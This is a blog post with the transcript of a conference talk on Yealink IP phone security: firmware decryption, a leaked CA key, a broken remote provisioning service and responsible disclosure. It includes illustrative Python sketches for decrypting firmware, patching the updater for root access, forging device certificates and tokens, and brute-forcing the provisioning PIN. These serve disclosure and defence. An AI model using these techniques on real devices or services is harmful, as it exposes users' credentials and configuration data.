WHY 2025 - Die Hardcoded: Unlocking Yealink's (weakest) secrets
2025/08/11
Jeroen Hermans

At WHY2025 I gave a talk about Yealink security together with Stefan Gloor.
In follow-up research after the last publication I teamed up with Stefan Gloor from Switzerland, which resulted in the presentation below; it received very positive reviews.
The video
The text
Okay. So, without further ado, I’m going to introduce Jeroen and Stefan, who are going to be talking to us about Yealink and firmware vulnerabilities. And actually, at the start of WHY, their company had just turned 23 years old. So, congratulations on that. And I will pass over to you to tell us about your research. Thank you.
Yes. Thank you so much for the nice introduction and thank you all for coming. We really appreciate your interest in our work. So let’s get started with the talk. First I’d like to start with a short agenda of today’s presentation. I will start with a short introduction about ourselves and Yealink. Then I’ll quickly go over how this project began, and how in previous work we were able to break the firmware encryption of these devices. Then we’ll continue on to the main part of the presentation, where we look at the new phones, at the improvements and new technologies, and we also take a look at the cloud service that the manufacturer provides.
Then we’ll go over our disclosure process for the vulnerabilities we found, and finally the outlook.
Yes. So first, quickly about me. My name is Jeroen Hermans and, as I said before, I founded my company CloudAware in 2002. I specialize in cyber security and I do public speaking. My company is based in The Hague, here in the Netherlands, and you can find me here at WHY2025 in the Swiss village.
Yes, my name is Stefan Gloor. I’m an electrical engineer by training and currently an embedded software developer by day, and in my free time I like to reverse engineer and break embedded devices of all sorts. I live in Zurich, Switzerland, and you can find my contact information here and here on campus. I’m also in the Swiss village.
So what’s Yealink? Yealink is a leading manufacturer of IP phones and other telecommunication equipment, such as desktop VoIP phones, which you can see here, video conferencing cameras, and all these kinds of things. They’re a fairly large corporation with multiple locations worldwide.
Their headquarters is, or used to be, in China, and now they seem to be moving to Singapore.
Well, let’s start where this project began, once upon a time, and it starts a bit sad. It’s in 2016, when my dad died and I had to move a lot of telecom equipment to the garage of my parents’ place. Obviously, insurance-wise that was highly undesirable, and I actually had to hire private security to guard my parents’ place while my father was being buried.
So I knew something had to change, and provisioning is the word that you use then. Provisioning basically means that you ship the equipment directly to your customer, and the first time the equipment boots it gets configured automatically. When I started implementing this provisioning system, I immediately found that there was an AES key for encryption in this system that had been leaked almost 10 years ago and could be found on GitHub. So that was highly suboptimal. Then I started doing more research into the security of Yealink more broadly in 2022, and in 2024 I met up with Stefan here. We met up in Zurich, Switzerland, and we teamed up to bring this research to the next level.
So first, 2022 to 2024, very quickly, a summary: there was a hard-coded AES key that was leaked; it had been on GitHub for a very long time already. Yealink replaced it with RSA encryption, but they immediately leaked the RSA private key. So that was also not optimal. They misinterpreted the SIP RFC a few times, and they claimed to have a GDPR certificate issued by TÜV. I asked TÜV about it, because they issued this certificate, and they responded by cancelling the certificate immediately.
Then, in the end, after the publications, I received legal threats from the Dutch importer of Yealink, and I received two summonses, which I held up during a video that I had to post online to explain what was happening.
Yes. So for my story: I started in 2024 to reverse engineer Yealink phones, basically just out of a coincidence that I got my hands on one, and, out of curiosity, I wanted to find out how it worked. During my reverse engineering efforts, I stumbled upon some very interesting design choices, you could say. And I wrote a blog post about my findings and how I discovered the architecture and reverse engineered the firmware in more detail. I started to look at the firmware, which is provided by the manufacturer through encrypted ROM files. The normal workflow would be that the manufacturer provides this file, you download it from their website, and then you load it onto your phone using the local web interface or some other automated system.
This encryption of the ROM files is actually implemented as custom cryptography, and a lot of work has already been done here in reverse engineering; there are also tools available. It’s actually a custom block cipher using an XOR with a static key, so it was fairly easy to reverse engineer already.
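To make that older scheme concrete, here is a minimal sketch of what an XOR-based "decryption" with a static key looks like. The key bytes and file names are placeholders, not the real values; the community tools mentioned above implement the actual ROM format.

```python
# Minimal sketch of the older ROM scheme: a repeating XOR with a static key.
# The key and file names below are placeholders, not the real values.

STATIC_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # placeholder

def xor_decrypt(blob: bytes, key: bytes = STATIC_KEY) -> bytes:
    """XOR every byte of the blob with the repeating static key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))

if __name__ == "__main__":
    with open("firmware.rom", "rb") as f:       # hypothetical input file
        plaintext = xor_decrypt(f.read())
    with open("firmware.decrypted", "wb") as f:
        f.write(plaintext)
```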
But I couldn’t use these existing tools for the new firmware, as the new firmware seemed to employ some new mechanism with presumably a new key. So what I did was investigate more deeply, and I found what I call a hardware-assisted AES: there is a microcontroller that is used to derive the AES key in a challenge-response fashion, you could say. This key can easily be extracted by sniffing the unencrypted serial bus between the main CPU and the microcontroller, and therefore you can obtain the key, because the main CPU will just send a value to the microcontroller.
The microcontroller applies some magic function to it and then returns the value back to the main CPU. These return values are concatenated together to yield the key. And of course, since you always need to arrive at the same key to be able to decrypt the firmware, if you sniff this exchange once and have the key, then you can always decrypt the firmware. That’s what I did, and so I could analyse it further.
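As an illustration of why sniffing the bus is enough, here is a rough sketch of reassembling the key from captured responses and decrypting with it. The response values, key length, AES mode and IV handling are all assumptions for the sake of the example, not the actual scheme.

```python
# Sketch: concatenate the microcontroller's responses (captured on the UART
# between the main CPU and the MCU) into the AES key, then decrypt the ROM.
# Response values, key length, AES mode and IV are placeholder assumptions.

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

sniffed_responses = [b"\x11\x22\x33\x44", b"\x55\x66\x77\x88",
                     b"\x99\xaa\xbb\xcc", b"\xdd\xee\xff\x00"]  # from a logic analyzer

aes_key = b"".join(sniffed_responses)
assert len(aes_key) in (16, 24, 32)

def decrypt_rom(ciphertext: bytes, iv: bytes = bytes(16)) -> bytes:
    """Decrypt a firmware blob with the recovered key (mode assumed)."""
    decryptor = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).decryptor()
    return decryptor.update(ciphertext) + decryptor.finalize()
```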
Then I could also get code execution via the update mechanism. This is because the update binary did not have any signature verification mechanism at all, so you could basically install anything that you wanted. I just had to understand the custom file format, and of course you become root, because the updater also runs as root.
In particular, I exploited a handy system shell command that was already there. So I just had to patch this string, and then you can run whatever you want.
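As a toy illustration of the "patch one string" trick (the real binary layout and strings differ; everything below is made up for the sketch):

```python
# Replace a command string inside the unpacked updater with our own, keeping
# the length identical so offsets in the binary stay valid. All names and
# strings here are invented for illustration.

ORIGINAL = b"/bin/original_cmd\x00"
PAYLOAD  = b"/tmp/run_my_code\x00\x00"      # padded to the same length
assert len(PAYLOAD) == len(ORIGINAL)

with open("updater", "rb") as f:
    image = f.read()

if ORIGINAL not in image:
    raise SystemExit("expected string not found; this build differs")

with open("updater.patched", "wb") as f:
    f.write(image.replace(ORIGINAL, PAYLOAD, 1))
```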
Yes. So this is then how we met. We had a mutual interest in Yealink security, so we set up a meeting in Zurich and decided to look at new Yealink models and especially their cloud infrastructure. Most of that had already been published; that was done in previous work. So what has changed? Surely everything’s fixed now, right? To investigate this question, we started with a new phone, in particular a SIP T44U, which you can see here. We chose this device because it’s the latest from the series. It seemed to be a nice new phone that is definitely not EOL and definitely has firmware support. So it’s definitely a good choice. I analysed this firmware again, and what I found is that the basic custom cryptography is still the same, which kind of makes sense, because presumably you need to maintain some forward and backward compatibility.
They’re also still using the same microcontroller trick to get the encryption key, but they introduced a signature check for the upgrade binary. So now it’s actually not that easy anymore to get custom code running, at least not with the same trick. And in the new hardware they introduced a new chipset that actually allows you to do secure boot, and they did implement that with a hardware trust anchor. So that’s actually a nice improvement there, security-wise.
So, cloud provisioning: what could possibly go wrong? Let’s first have a look at what cloud provisioning is, and I made a picture for this. On the left-hand side you can see a Yealink phone, just like you can see here. In the middle you can see the internet, and on the right-hand side you see the Yealink-controlled RPS server, the remote provisioning service. First the phone asks: “where can I find my configuration?” So the question is not “what is my configuration”, it asks “where is my configuration”. The RPS server of Yealink responds with: “here are the credentials and URL to access your configuration”. The phone then asks “hello, I’m device XYZ, give me my configuration” to the customer provisioning server. This can be a customer-controlled provisioning server or some external service, and that server responds with an XML document that says “here’s the configuration”.
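In code, the flow looks roughly like the sketch below. The endpoints, parameters and response fields are illustrative only; the real RPS protocol differs and authenticates the device with a client certificate (more on that below).

```python
# Rough sketch of the two-step provisioning flow: ask the vendor RPS *where*
# the configuration lives, then fetch it from the (customer-run) server.
# URLs, paths and JSON fields are hypothetical.

import requests

MAC = "001565aabbcc"  # example device MAC

# Step 1: "where can I find my configuration?"
rps = requests.get(
    f"https://rps.example.invalid/redirect?mac={MAC}",
    cert=("device-client.pem", "device-client.key"),  # device client certificate
    timeout=10,
)
redirect = rps.json()  # e.g. {"url": ..., "username": ..., "password": ...}

# Step 2: "hello, I'm device XYZ, give me my configuration"
cfg = requests.get(
    f"{redirect['url']}/{MAC}.cfg",
    auth=(redirect["username"], redirect["password"]),
    timeout=10,
)
print(cfg.text)  # the configuration document with SIP credentials etc.
```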
So what is in this provisioning data? Well, it’s a huge template document.
I urge you to have a look at it. There’s a lot of information in there, but let’s have a look at a few things. SIP credentials, obviously: username, password, SIP server URL. There’s phone book data in there; you don’t want that leaked. The provisioning server credentials, AES keys, HTTP authentication information, network information of your company, VLAN information, TR-069, server certificates, XML push server URLs, LDAP credentials, you name it. There’s user data in there. BLF, busy lamp fields: those are the shiny lights that you see on the edge here that indicate whether the CEO is actually in a call or not. Hotdesking information is also in there. Action URLs that you can set for callbacks to a web server, and much, much more. It’s a huge document and I urge you to have a look at it.
Yes. And to authenticate the phone towards the RPS system, they use client certificates issued by a Yealink CA. These certificates are used to uniquely identify a device towards the RPS system, so the RPS system can decide whether or not to give that phone the credentials for the configuration server. But unfortunately, the CA private key was hard-coded into the firmware binary.
Although it was obfuscated with a static AES key, it was fairly easy to extract. And with that we had full access to the certificate authority, which allowed us to issue arbitrary client certificates for an arbitrary phone.
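To show why a leaked CA key is fatal, here is a sketch of minting a client certificate for an arbitrary device identity with Python’s cryptography library. File names and the subject field are placeholders.

```python
# With the leaked CA private key, anyone can issue a client certificate for an
# arbitrary device (here identified by its MAC). File names and fields are
# placeholders for illustration.

import datetime
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

with open("leaked_ca_key.pem", "rb") as f:
    ca_key = serialization.load_pem_private_key(f.read(), password=None)
with open("ca_cert.pem", "rb") as f:
    ca_cert = x509.load_pem_x509_certificate(f.read())

device_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "001565aabbcc")])

forged = (
    x509.CertificateBuilder()
    .subject_name(subject)
    .issuer_name(ca_cert.subject)
    .public_key(device_key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(datetime.datetime.utcnow())
    .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
    .sign(ca_key, hashes.SHA256())
)

with open("forged-client.pem", "wb") as f:
    f.write(forged.public_bytes(serialization.Encoding.PEM))
```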
They did also employ an authentication token as kind of an additional layer of security in the RPS authentication, but here too it is a static derivation algorithm using a hard-coded AES key. It does contain five digits of the serial number as a 2FA PIN, so actually these five digits are everything you need to know to be able to create an authentication token for a particular phone. So, in summary, the authentication to the RPS system is completely broken.
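Purely as an illustration of why a static derivation is worthless as a second factor, a sketch along these lines (the key, payload layout and cipher mode are invented; the actual algorithm is not reproduced here):

```python
# Illustrative only: if the token is just AES(hard-coded key, MAC + 5 serial
# digits), anyone who knows those inputs can compute a valid token. The key,
# padding and layout below are NOT the real scheme.

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

HARDCODED_KEY = bytes(16)  # stand-in for the key extracted from the firmware

def forge_token(mac: str, serial_digits: str) -> str:
    payload = f"{mac}:{serial_digits}".encode().ljust(32, b"\x00")
    enc = Cipher(algorithms.AES(HARDCODED_KEY), modes.ECB()).encryptor()
    return (enc.update(payload) + enc.finalize()).hex()

print(forge_token("001565aabbcc", "12345"))
```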
This is also what we demonstrated here in our proof of concept. We created a little web-based tool where you can enter the MAC address of the phone that you’re targeting and the serial number or the five digits of the serial number. Then press enter and the tool will yield all the configuration files of that phone.
Yes. So this is the second round of publications that I’m doing about Yealink, and the last time Yealink was not very happy with me. They thought I was so cool that they actually froze my enterprise account, so I was no longer able to log in to the management cloud service of Yealink. That was very unfortunate. Luckily, the RPS management platform also has an API, and they forgot to block that.
So that was a bit unfortunate for them, but luckily a CVE was issued. It is a bit of a lengthy document, but I think you can look it up under this number.
Yes. Also, the API allows you to specify certificates that are used by the phone when authenticating the configuration server. And here, if you look closely, it actually does not validate what you upload, whether it’s a certificate or just random data. So, in short, that’s another CVE.
Also, what about rate limits? I mean, we saw that you need the serial number in order to create the authentication token. Well, there are no rate limits; you can just brute force this PIN. And actually, because this PIN is not completely random, not uniformly distributed, it makes it even easier.
So we also wrote a little tool to brute force the 2FA PIN and break the encryption, and that also gave us a CVE.
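The brute force itself is trivial once there is no rate limit: at most 100,000 candidates. The sketch below reuses the hypothetical forge_token() from above; the endpoint and the success check are assumptions.

```python
# At most 100,000 candidate PINs when nothing rate-limits you. Endpoint,
# parameters and the "valid" check are hypothetical; forge_token() is the
# illustrative helper sketched earlier.

import requests

def find_pin(mac: str) -> str | None:
    for i in range(100_000):
        pin = f"{i:05d}"
        r = requests.get(
            "https://rps.example.invalid/api/device",   # hypothetical endpoint
            params={"mac": mac, "token": forge_token(mac, pin)},
            timeout=10,
        )
        if r.status_code == 200:                        # assumed success signal
            return pin
    return None

print(find_pin("001565aabbcc"))
```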
Also, the API allows you to enumerate MAC addresses. So you can just iterate through MAC addresses to see whether or not they are enrolled in the RPS service. So, to make the painful summary: we have a CVE because the API lacks rate limiting; we have an authentication bypass for blocked accounts; we have a certificate upload function that lacks input validation; and we actually have two more CVEs that are assigned but not published yet, one for the leaked private key of the certificate authority and one for the AES key used for the firmware encryption.
One more thing: welcome everyone to Europe, and in Europe we have the GDPR. On the website of Yealink you can find that they’re very proud to have this logo on there, and it says “download report”. So obviously I wanted to have a look at this report, because the last one was retracted by TÜV. And it turns out this time I can’t download it; I need to ask for this document. Obviously I did, and Yealink said, well, it’s a bit difficult, you have to sign an NDA, et cetera, et cetera, but we can give you this document. And this is a screenshot of that document; it is part of the document.
It is a bit of an interesting document, because it says TÜV SÜD and it has a service period from the 1st of January to the 31st of December. So I thought, let’s have a look at the metadata of this PDF. And it’s a bit of interesting metadata, because the author is not TÜV or Yealink, it’s Huawei. Okay. And it was produced on May 29th, which is interesting timing, because the document is already valid from the 1st of January. But it’s extra interesting because one week before, I sent this email.
“Hello, my name is Jeroen Hermans and I have been in contact with Yealink before about vulnerabilities. Unfortunately, I have to contact you again about a series of vulnerabilities I found together with my fellow security researcher Stefan Gloor.”
So that is interesting timing, because it is just a week before. I don’t know why that was. What’s more interesting is that the same document was edited one day later, and it was edited with an open-source software package called iText, version 5.5.10. Now, version 5.5.10 is on GitHub and was released in 2016, and, well, given the security history of PDF, I think that’s a bit of a risk.
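For reference, this kind of metadata is plain document metadata that anyone can read, for example with pypdf (the file name here is a placeholder):

```python
# Read the standard PDF metadata fields discussed above (author, producer,
# creation and modification dates). The file name is a placeholder.

from pypdf import PdfReader

meta = PdfReader("tuev_report.pdf").metadata
print("Author:   ", meta.author)
print("Producer: ", meta.producer)           # e.g. "iText 5.5.10"
print("Created:  ", meta.creation_date)
print("Modified: ", meta.modification_date)
```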
So obviously this raises questions. So I asked a lot of questions: is this even your document? It doesn’t mention a certificate number; it’s untraceable. It doesn’t say what was tested. It doesn’t say to what standard it was tested. It doesn’t mention an issue date. It’s signed by someone I cannot find on Google as an employee of TÜV; is this an employee? It says it was created by Huawei, five months after it went into effect; can you explain the timeline? It was edited with a very old open-source piece of software; can you explain this? Is this the way that TÜV would like to operate?
And legally, I’m going to show you the full response that I received from TÜV, and it says this. Please read it back in the recordings, but there are two things that I would like to point out. The first one is: this is not a certificate. That’s why it’s untraceable. It’s basically a document that says that TÜV did some work for Yealink, and that’s it. And the second thing is: it is indeed a document from TÜV Shanghai.
So, there are a lot of facts and information in there, and I’m not entirely sure what to think about those facts, but those are the facts. So, let’s fix things. We have to disclose at some point in time, right? We can’t keep this to ourselves. So, first we need a legal framework, and we thought a good place to start with the legal framework is the Convention for the Protection of Human Rights and Fundamental Freedoms, signed in Rome in 1950.
And it states the following: the exercise of these freedoms may be restricted only where necessary in a democratic society, in the interests of national security, territorial integrity, public safety, the prevention of disorder or crime, blah blah blah, the protection of the reputation or rights of others, and preventing the disclosure of information received in confidence. Definitely what we’re talking about here. So, that’s Article 10 of the Convention for the Protection of Human Rights. So, yeah, I think that’s usable. And this was also reaffirmed by the Dutch public prosecution service, the Openbaar Ministerie in Dutch. They have a document online about ethical hacking, and it states the following in Dutch; I translated it for you.
There are three things that you need to take into account in order to be on the legal side of things. First: was the action that you carried out in the context of a legitimate societal interest? Well, we think it was. Unfortunately, we told the organizations that this is about that we wouldn’t disclose who they are, but there is definitely a very legitimate societal interest at play here.
The second one is: is it proportionate? In other words, did you not go any further than was needed to prove what you wanted to prove? For example, we did this by buying our own equipment.
The third one is subsidiarity. In other words, were there less intrusive ways to achieve it? For example, when we went to enumerate, we didn’t do this in a script-kiddie way. We constantly monitored the response times of the RPS servers, and when that response time went up, we throttled. So we could probably have done it faster, but we didn’t, because we wanted to stay correctly on the legal side and we didn’t want to break anything for everyone in the world.
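For what it’s worth, the self-throttling we describe boils down to something like the sketch below: measure the response time and back off when it climbs. The thresholds and the way requests are issued are illustrative.

```python
# Adaptive throttling sketch: slow down whenever the server's response time
# rises above an assumed baseline, recover slowly otherwise.

import time
import requests

BASELINE_S = 0.3     # assumed "normal" response time
delay = 0.5          # current delay between requests

def polite_get(url: str) -> requests.Response:
    global delay
    start = time.monotonic()
    resp = requests.get(url, timeout=10)
    elapsed = time.monotonic() - start
    if elapsed > 2 * BASELINE_S:
        delay = min(delay * 2, 30)       # server looks loaded: back off
    else:
        delay = max(delay / 1.5, 0.5)    # ease back toward the base rate
    time.sleep(delay)
    return resp
```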
So, disclosure procedures are complicated, and often it’s more of an NDA. In the case of Yealink, this was a very interesting one, because the vulnerability disclosure procedure said that you would transfer all the intellectual property of your findings to Yealink. I’m not saying that they would, but it would create an opportunity for Yealink to sue you for IP infringement if you ever published your findings, and I think that’s a lot easier than trying to sue someone because they were an ethical hacker. So we rejected their vulnerability disclosure procedure in the very first email and said we have our own vulnerability disclosure procedure: we are here to help you. Sometimes this is a bit complicated for the manufacturer and the government organizations involved, but I think in the end everyone said, listen, we believe that you are doing the right thing and that you have thought about this.
We feel that standard vulnerability disclosures are sometimes unfair to the victims, also called customers. You give three months, or maybe half a year, to a manufacturer, and the manufacturer has all this time to fix things, and then we go to full disclosure and it’s dumped onto the world, and then every IT team has to work weekends to fix it and to mitigate, and we feel that’s very unfair. So what we did is also contact important and large customers of Yealink. That was very easy, because they’re all on the website of Yealink, and we had some meetings with these people, and some of them said: actually, we really appreciate that you contacted us, but this is our worst nightmare. We also contacted National Cyber Security Centres in order to be sure that government organizations were also covered.
So, the timeline is: we contacted Yealink on May 19th, just before that TÜV document, remember, and they responded by advising to update all your firmware, and they did that last time too. They stated again that this is only about end-of-life devices, that obviously there are security issues with end-of-life devices, and that they cannot say anything about end-of-life devices. But in fact we bought the very latest and newest of their phones, so this is absolutely untrue. And unfortunately, very quickly after we started our vulnerability disclosure, the manufacturer went public with their advisory.
Now that’s new, and that also created a situation where we had to act ourselves, which is not the way we wanted to do it.
It led to a few publications on our own blogs. Das Netz Ist Politisch published an amazing article by Marcel Waldvogel, who is actually here today. The article is amazing and I urge you to read it. It’s in German, but Google Translate will obviously help you. Well, we already saw a lot of CVEs, and more are to come.
I think Yealink also saw that going fully public with their advisory was maybe not the best idea. So they said: now it’s a non-public link, and you can no longer access it because, and you can see it there in the quotes, it’s not my wording, it’s theirs, it contains “confidential client communication”. That’s their wording, not mine; I don’t want to change anything about that. So I asked for an access code, because obviously this is about our disclosure, and I think it would be interesting to read what the manufacturer themselves want to disclose about it. Unfortunately, they didn’t react to that request. Fortunately, we are security experts. So we looked in the source code.
I did not believe this; I actually had to copy this password myself, and it did work. Yes, so, let’s have a look at the future then, and make an outlook. What can we take from our findings? First, we’ll quickly go through some mitigation steps that we believe could be helpful to reduce the risk of the vulnerabilities that we found being exploited. In general, network isolation is always helpful; it’s always helpful to segment different parts of your network. In particular, this would mean that you do not have your configuration server, which holds all this sensitive data, accessible from the internet, but have it isolated through some physical network, or VLAN, or IP filtering, or whatever. We also think that the manufacturer could employ some one-time provisioning scheme, so that the configuration data is only accessible once, as you would think such a phone would only need to be configured once. This could be implemented with some cryptographic keys, or maybe a provisioning URL that expires, or something like that. Also, there could be proper out-of-band authentication to verify that it is actually you who is trying to reconfigure your phone, and that you are actually allowed to access the configuration. And, if possible, don’t use RPS at all. I mean, it’s always better not to trust and rely on some third-party infrastructure with your sensitive data.
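As a sketch of the “provisioning URL that expires” idea (our suggestion, not an existing Yealink feature; names and parameters are illustrative): the server signs the device identity plus an expiry timestamp and refuses the URL afterwards, ideally also invalidating it after first use.

```python
# Sketch of a signed, expiring provisioning URL: HMAC over the device identity
# and an expiry timestamp, verified by the configuration server. Everything
# here is illustrative.

import hashlib
import hmac
import time

SERVER_SECRET = b"rotate-me-regularly"   # secret held only by the server

def make_provisioning_url(mac: str, ttl_s: int = 600) -> str:
    expires = int(time.time()) + ttl_s
    sig = hmac.new(SERVER_SECRET, f"{mac}:{expires}".encode(), hashlib.sha256).hexdigest()
    return f"https://prov.example.invalid/cfg?mac={mac}&exp={expires}&sig={sig}"

def verify(mac: str, expires: int, sig: str) -> bool:
    if time.time() > expires:
        return False
    good = hmac.new(SERVER_SECRET, f"{mac}:{expires}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(good, sig)
```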
So, the takeaways of this talk in summary: don’t roll your own crypto, that’s never a good idea. What’s also a bad idea is hard-coding cryptographic keys. In general, stick to secure design principles. It’s never a good idea to have your CA private key replicated thousands of times, on each phone. And if you think you know better than the security design principles, you probably don’t. And some future work you could focus on, if you’re inspired by this talk: you could look at whether the issues are really fixed as promised by the manufacturer and how exactly that is implemented. You could also look at other devices; they have a lot of different devices, different categories of devices, and they also have Microsoft Teams enabled phones that have a different architecture.
Yeah, video conferencing equipment. Also, it would be interesting to look at how other manufacturers are doing it. And yes, that concludes our talk. Thank you very much for your attention.